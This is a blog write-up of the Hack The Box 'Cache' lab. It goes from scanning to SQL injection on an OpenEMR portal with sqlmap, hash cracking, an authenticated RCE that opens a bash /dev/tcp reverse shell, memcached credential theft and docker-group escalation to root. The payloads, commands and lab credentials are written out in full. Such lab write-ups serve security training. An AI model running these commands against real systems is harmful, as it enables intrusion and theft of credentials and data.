Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Cache

0 - Basic info

OS: Linux


1 - Reconnaissance and enumeration

sudo nmap -sS -sV -sC -O
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 23:02 CEST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops                                                                                                                                                                                                                   
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                                                                                                                    
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                      
Nmap done: 1 IP address (1 host up) scanned in 22.38 seconds 
nmap -Pn -n -sV --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 23:06 CEST                                                                                                                                                                           
Nmap scan report for                                                                                                                                                                                                          
Host is up (0.048s latency).                                                                                                                                                                                                               
Not shown: 997 closed ports                                                                                                                                                                                                                
PORT     STATE    SERVICE   VERSION                                                                                                                                                                                                        
22/tcp   open     ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                                                                   
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                                                                            
80/tcp   open     http      Apache httpd 2.4.29 ((Ubuntu))                                                                                                                                                                                 
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                                                                            
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
|   Found the following possible CSRF vulnerabilities: 
|     Path:
|     Form id: fname
|     Form action: contactus.html#
|     Path:
|     Form id: loginform
|_    Form action: net.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /login.html: Possible admin folder
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|_      CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
2107/tcp filtered msmq-mgmt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.87 seconds

Nothing interesting at first place.

Checking inside the port 80, there is a form login:

alt text

I tried to bruteforce using usual password without luck.

So, I manually checked the sources inside the web:


    var error_correctPassword = false;
    var error_username = false;
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         error_username = false;

        if(error_correctPassword == false && error_username ==false){
            return true;
            return false;

So the password is H@v3_fun, but does nothing using it, saved for later.

Also I got another username on the sources:

alt text

John, because:

<img src="logo1.png" alt="John" style="width:100%">

Also there is enabled Apache directory list, leaking the OS and Apache version:

alt text

I was stuck for a while, then I came back to the login page after the sucess I saw:

alt text

HMS…Hospital Management System. It caugth my attention because is totally different from the hacker stuff that the blog has.

Checking on Google, says that is a kind of CMS or Software for medic/doctors administration.

I tried to search references inside the host and finally I discovered that it has another hostname, so editing my /etc/hosts: cache.htb hms.htb

Now I can view the openmr login page

alt text

2 - Vulnerability Identification

I tried to bruteforce the login page without any luck and started a Dirbuster with a really huge results:

alt text

Googling again

Checking on exploit-db, there is a Exploit to bypass the login:


But did not work, maybe because of the version.

So finally I discovered this video:


The video says there is a SQLInjection on:


I forced the error with -1:


alt text

3 - Exploit

I saved the request with Burp Suite and saved to a file request.txt

GET /portal/add_edit_event_user.php?eid=-1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=meu64c25re4gemh5babmve2r50; PHPSESSID=j3bt6qtabctf5euorhg3lme69f
Upgrade-Insecure-Requests: 1


qlmap -r request.txt 
 ___ ___[.]_____ ___ ___  {1.4.7#stable}                                                                                                                                                                                                   
|_ -| . [.]     | .'| . |                                                                                                                                                                                                                  
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:38:14 /2020-08-03/

[20:38:14] [INFO] parsing HTTP request from 'request.txt'
[20:38:14] [WARNING] it appears that you have provided tainted parameter values ('eid=-1') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:38:29] [INFO] testing connection to the target URL
[20:38:30] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[20:38:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:38:30] [INFO] testing if the target URL content is stable
[20:38:30] [INFO] target URL content is stable
[20:38:30] [INFO] testing if GET parameter 'eid' is dynamic
[20:38:30] [WARNING] GET parameter 'eid' does not appear to be dynamic
[20:38:30] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[20:38:30] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:38:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:40] [WARNING] reflective value(s) found and filtering out
[20:38:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:38:41] [INFO] GET parameter 'eid' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[20:38:41] [INFO] testing 'Generic inline queries'
[20:38:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:38:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:38:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:38:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:38:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:38:42] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:38:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:42] [INFO] GET parameter 'eid' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[20:38:42] [INFO] testing 'MySQL inline queries'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:38:42] [WARNING] time-based comparison requires larger statistical model, please wait... (done)                                                                                                                                       
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:38:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:38:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:38:53] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:38:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:38:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:38:54] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:38:54] [INFO] target URL appears to have 4 columns in query
[20:38:54] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (2161=2161) THEN 0x2d31 ELSE (SELECT 3529 UNION SELECT 3223) END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: eid=-1 AND EXTRACTVALUE(5916,CONCAT(0x5c,0x717a6b7071,(SELECT (ELT(5916=5916,1))),0x71706a6a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=-1 AND (SELECT 3259 FROM (SELECT(SLEEP(5)))eVqd)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7071,0x4c78526f76514b4552714c6f596873486f64554561686e68704946414d4e54415453725142684e6a,0x71706a6a71),NULL-- -
[20:39:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[20:39:02] [INFO] fetched data logged to text files under '/home/u915/.local/share/sqlmap/output/hms.htb'

[*] ending @ 20:39:02 /2020-08-03/

[20:42:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[20:42:00] [INFO] fetching database names
[20:42:00] [INFO] retrieved: 'information_schema'
[20:42:00] [INFO] retrieved: 'openemr'
available databases [2]:                                                                                                                                                                                                                  
[*] information_schema
[*] openemr

Great, can be exploited. The backend is MySQL and there are 2 databases openemr and information_schema

Extracting the data

Next step is to dump useful data:

sqlmap -r request.txt --tables -D openemr
| array                                 |
| groups                                |
| sequences                             |
| version                               |

[... Redacted because was too long]

| therapy_groups_participants           |
| transactions                          |
| user_settings                         |
| users                                 |
| users_facility                        |
| users_secure                          |
| valueset                              |
| voids                                 |
| x12_partners                          |

A lot of stuff here, but I want the juicy users and passwords:

sqlmap -r request.txt --dump -D openemr -T users

Database: openemr
Table: users_secure
[1 entry]
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |

[20:47:37] [INFO] table 'openemr.users_secure' dumped to CSV file '/home/u915/.local/share/sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[20:47:37] [INFO] fetched data logged to text files under '/home/u915/.local/share/sqlmap/output/hms.htb'

[*] ending @ 20:47:37 /2020-08-03/

Ok, so username is:


and the password hash is:


Cracking the hash with John

sudo john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-08-03 20:54) 2.439g/s 2063p/s 2063c/s 2063C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed

hummm the password is:


Using the password to log in I discovered the real version of EMR, I tried on the beginning to use exploits but did not work because of the version and patching:

alt text

But… there is another authenticated RCE exploit:


All I need is to use the working cracked password and username that I used to log in on EMR:


Reverse shell

Upgrade the shell, because working on the webshell is hard:

Listener on my machine:

nc -lvp 1337


python 45161.py -u "openemr_admin" -p "xxxxxx" -c 'bash -i >& /dev/tcp/ 0>&1' http://hms.htb/


connect to [] from cache.htb [] 33772
bash: cannot set terminal process group (1884): Inappropriate ioctl for device
bash: no job control in this shell

But is a bad shell…

First I upgraded to shell with Python to be more interactive:

www-data@cache:/var/www/hms.htb/public_html/interface/main$ python3 -c 'import pty; pty.spawn("/bin/bash")'       
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'     

User Ash and flag

Now I can use the previous credentials, ash/H@v3_fun

www-data@cache:/var/www/hms.htb/public_html/interface/main$ su ash
su ash
Password: H@v3_fun

Getting the user flag inside /home/ash

cat user.txt

4 - Post-Exploitation and privilege escalation

Now is time to scalate priveleges.


Testing sudo:

ash@cache:~$ sudo -l
sudo -l
[sudo] password for ash: H@v3_fun

Sorry, user ash may not run sudo on cache.

Bad luck no sudo enabled.


Checking the processes running inside the machine I discovered the juicy docker (but Ash can not manage it) and also memcached.

memcache  1109  0.0  0.1 425792  4152 ?        Ssl  Aug02   0:19 /usr/bin/memcached -m 64 -p 11211 -u memcache -l -P /var/run/memcached/memcached.pid
root      1110  0.1  1.7 938776 69084 ?        Ssl  Aug02   1:59 /usr/bin/dockerd -H fd://
root      1116  0.0  0.1  72300  6440 ?        Ss   Aug02   0:00 /usr/sbin/sshd -D
root      1117  0.0  1.0 956812 40540 ?        Ssl  Aug02   0:08 /usr/bin/containerd
root      1156  0.0  0.1 288884  6468 ?        Ssl  Aug02   0:02 /usr/lib/policykit-1/polkitd --no-debug
root      1223  0.0  0.0  14888  1968 tty1     Ss+  Aug02   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux

Memcache extraction

Using the Metasploit module to extract credentials:

msf5 auxiliary(gather/memcached_extractor) > show options

Module options (auxiliary/gather/memcached_extractor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    11211            yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

But firts i did a port fordwarding with Chisel:

Using python http.server on my machine to delivery Chisel:

python3 -m http.server 8001
Serving HTTP on port 8001 ( ... - - [03/Aug/2020 21:53:54] "GET /chisel HTTP/1.1" 200 -

on the HTB box:


Port enabled:

./chisel server -p 9003 --reverse
2020/08/03 21:51:14 server: Reverse tunnelling enabled
2020/08/03 21:51:14 server: Fingerprint 6c:26:25:39:1c:cf:12:97:9a:d0:d4:04:1b:4b:76:8a
2020/08/03 21:51:14 server: Listening on

ash@cache:~/.local/chisel$ ./chisel client R:11211:
<sel client R:11211:
2020/08/03 19:55:38 client: Connecting to ws://
2020/08/03 19:55:38 client: Fingerprint 6c:26:25:39:1c:cf:12:97:9a:d0:d4:04:1b:4b:76:8a
2020/08/03 19:55:38 client: Connected (Latency 42.81155ms)

Now I can easy use Metasploit:

msf5 auxiliary(gather/memcached_extractor) > exploit

[+]       - Found 4 keys

Keys/Values Found for

 Key      Value
 ---      -----
 account  "VALUE account 0 9\r\nafhj556uo\r\nEND\r\n"
 file     "VALUE file 0 7\r\nnothing\r\nEND\r\n"
 passwd   "VALUE passwd 0 9\r\n0n3_p1ec3\r\nEND\r\n"
 user     "VALUE user 0 5\r\nluffy\r\nEND\r\n"

[*]       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Great new credentials:


Log in as luffy

Now I can use the credentials to log in as luffy on the system.

luffy@cache:/var/www/hms.htb/public_html/interface/main$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

Good, luffy has the group docker.

Root and flag

Docker is a GTFO bin so lets go:


luffy@cache:/var/www/hms.htb/public_html/interface/main$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        10 months ago       64.2MB

The docker repo is ubuntu.

luffy@cache:/var/www/hms.htb/public_html/interface/main$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
<cker run -v /:/mnt --rm -it ubuntu chroot /mnt bash     


root@92a12207d8d2:/# whoami

Finally, getting the root flag:

root@92a12207d8d2:/# cat /root/root.txt
cat /root/root.txt

Thanks for reading!